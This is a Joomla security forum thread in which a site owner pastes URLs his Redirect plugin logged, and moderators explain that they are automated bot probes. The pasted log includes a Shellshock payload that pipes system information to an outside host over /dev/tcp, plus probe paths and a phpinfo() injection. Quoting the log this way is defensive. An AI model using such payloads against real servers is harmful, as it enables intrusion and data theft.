Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, fcoulter, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Post Reply
SForsgren
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 152
Joined: Fri May 12, 2006 2:46 am

Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by SForsgren » Sun Jun 28, 2015 6:33 am

I had a plugin "System - Redirect" enabled but don't rely on it for any function on my web site. I recently had a DOS like scenario where one IP address was trying to access the same non-existing page on my site over and over again. The IP was blocked and I am working with the hosting company.

I continued looking through the site for any other possible issues that may be a security exposure. When I looked at the setup for the Redirect component, I see lots of things added there that I did not add. From what I have read, the system automatically adds URLs to the list, correct?

I have 2 domains - one for testing upgrades and one for the production site. Both have different entries but both have a number of them. Many of these look like pages that hackers tried to exploit on my site but when I try to go to the URL, they return a 404. Were these auto-added from someone's attempt to go to these on my site? Or is this an indication that someone was able to add them directly to the redirect manager?

Note: I have no wordpress on my site at all but see URLs in Redirect Manager. Does this mean someone tried to access this URL even though it did not exist and so it added to Redirect Manager?

I looked for many of the directories and/or php files that were listed, but none of them appear to exist on the server.

I have removed domains and IPs from the below. Most of them don't seem to point to actual files on my system. Can someone confirm that these are attempts to hack a site and not that someone was able to actually add them to the redirect manager otherwise?

Thank you for any insights.

Thanks.
Scott

() { :;}; /bin/bash -c "echo domain.COM/cgi-bin/test-cgi > /dev/tcp/nn.nn.nn.nn/23; /bin/uname -a > /dev/tcp/nn.nn.nn.nn/23; e

http://www.domain.comhttp//www.domain.c ... trackback/

about-us/treatments-and-how-it-works/holistic-weight-loss-program/feed/

http://www.domain.com/about-us/treatmen ... ting/feed/

wp-content/uploads/wpallimport/uploads/604f3067e5ebc9a95fee9e1359a56504/info.php

http://domain.com/wp-content/plugins/wp ... ntYJqP.php

http://domain.com/wp-content/uploads/wp ... f/info.php

about-us/make-an-appointment/?wcalendar=1435708800#app_schedule

http://domain.com//components/com_jooml ... la_lib.php

http://domain.com/wp-content/uploads/wp ... d/info.php

http://domain.com/wp-content/plugins/wp ... ntYJqP.php

http://domain.com/modules/mod_footer/tm ... en=phpinfo();

http://domain.com/cgi-bin/test-cgi

User avatar
pe7er
Joomla! Master
Joomla! Master
Posts: 21980
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, The Netherlands
Contact:

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by pe7er » Sun Jun 28, 2015 9:23 am

Joomla's Redirect Plugin registers every 404 error. If I would go to your website and try www.example.com/peter-was-here then you would find "peter-was-here" listed in your Redirect Manager.

Most URLs are from bots that are trying to fingerprint your website and/or find known vulnerabilities. They tried /wp-content/ on your Joomla website. Maybe to see if you were using that CMS, or trying to exploit a Wordpress (or WordPress 3rd party extension) vulnerability.

Nothing much to worry about. I remove the non existing & unpublished 404 errors regularly. I analyse the ones with many hits & might create redirects for those.

Regarding the DOS attack on a non-existing page on your site: I think that that's a mistake of the people trying to DDOS your website. DDOS attacks try to use all your server's resources so your website becomes inaccessible. A 404 error will probably use less resources than a working page, because the page will load images etc as well.
Kind Regards,
Peter Martin, Global Moderator
https://db8.nl - Joomla specialist, Nijmegen, Nederland
Co-founder of data2.eu GDPR Tool https://data2.eu/en/gdpr-tool

SForsgren
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 152
Joined: Fri May 12, 2006 2:46 am

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by SForsgren » Sun Jun 28, 2015 2:56 pm

Thank you very kindly for the reply. I appreciate your response and time. Best

dianaNashif
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Tue Mar 20, 2012 8:15 pm

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by dianaNashif » Tue Nov 10, 2015 3:26 pm

Thank you for having info on this. It has been happening my my joomla site for 2 weeks now. I can't find an ip to block so I keep removing the errors.

Kindest Regards,
Diana

User avatar
Chacapamac
Joomla! Guru
Joomla! Guru
Posts: 812
Joined: Wed Feb 20, 2008 6:50 am
Location: Canada, Montreal
Contact:

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by Chacapamac » Wed Feb 08, 2017 10:35 pm

Joomla 3.6.5

• What about URL in the redirect like ?

Code: Select all

http://my.web.server.ip/guestbook/fckeditor/fckeditor.js

http://my.web.server.ip/HNAP1

http://my.web.server.ip/home

http://my.web.server.ip/home.asp
• No way to know from what IP those come from ?
Can God help us?
Marketing, SEO, Web development - Powered by Joomla!
http://www.grafcomm.ca/

emeyer
Joomla! Explorer
Joomla! Explorer
Posts: 352
Joined: Thu Sep 29, 2005 2:37 am

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by emeyer » Sat Feb 11, 2017 8:58 am

What I found was blockoing IPs make no difference for these kind of things. The offenders user a continually changing ring of IPs, and some even automate the frequency they revisit your site to adjust for any temporary blocks. So what I do is set a redirect on them to the white house 'contact us' page, where they can write to that 'administrator.' Magically, after a day of of possibly inviting investigation from the Department of Homeland Security, they decide not to visit any more ).

User avatar
pe7er
Joomla! Master
Joomla! Master
Posts: 21980
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, The Netherlands
Contact:

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by pe7er » Sat Feb 11, 2017 9:24 am

emeyer wrote:What I found was blockoing IPs make no difference for these kind of things. The offenders user a continually changing ring of IPs, and some even automate the frequency they revisit your site to adjust for any temporary blocks. So what I do is set a redirect on them to the white house 'contact us' page, where they can write to that 'administrator.' Magically, after a day of of possibly inviting investigation from the Department of Homeland Security, they decide not to visit any more ).
A few years back I created a 301 redirect in .htaccess to redirect certain unwanted traffic to the FBI. I also imagined the reaction of the unwanted visitors when they would see the FBI page.

Later I realized that it's just automated bots, usually on hacked computers or servers, that generate that unwanted traffic. And those bots do not care. And the FBI + White House probably have somewhat more important things to do then to be bothered about those bots.

btw: have you thought about redirecting unwanted traffic to 127.0.0.1 ? :)
Kind Regards,
Peter Martin, Global Moderator
https://db8.nl - Joomla specialist, Nijmegen, Nederland
Co-founder of data2.eu GDPR Tool https://data2.eu/en/gdpr-tool

emeyer
Joomla! Explorer
Joomla! Explorer
Posts: 352
Joined: Thu Sep 29, 2005 2:37 am

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by emeyer » Sat Feb 11, 2017 10:52 am

Yes, I did try other redirections, but I found the one to contact the usa president the most effective. and that was when obama was in office.

User avatar
Chacapamac
Joomla! Guru
Joomla! Guru
Posts: 812
Joined: Wed Feb 20, 2008 6:50 am
Location: Canada, Montreal
Contact:

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by Chacapamac » Sat Feb 11, 2017 6:03 pm

Pe7er
have you thought about redirecting unwanted traffic to 127.0.0.1
Is this redirect to the Sender ? What will be the impact on the server?
Can God help us?
Marketing, SEO, Web development - Powered by Joomla!
http://www.grafcomm.ca/

emeyer
Joomla! Explorer
Joomla! Explorer
Posts: 352
Joined: Thu Sep 29, 2005 2:37 am

Re: Unusual URLs showing in Redirect Plugin - Joomla 3.3.6

Post by emeyer » Sat Feb 11, 2017 7:25 pm

Pe7er is right, what most people do is redirect to 127.0.0.1 actually for sound reason.

The redirect would attempt to get from a localhost on any server running on the same machine as the client, and then typically be disconnected by the aggressor's own firewall, with minimal impact on your own server. The theory is that this most increases the load on the machine issuing the original request, which reduces the rate at which it can issue another request, and therefore mitigates DoS attacks.

So if DoS is your main concern, then 127.0.0.1 is better. But I was trying to stop repeated visits over more extended periods, rather than mitigate DoS, and that is what I meant to say I found more efficient.

Thank you for the good question )



Post Reply

Return to “Security in Joomla! 3.x”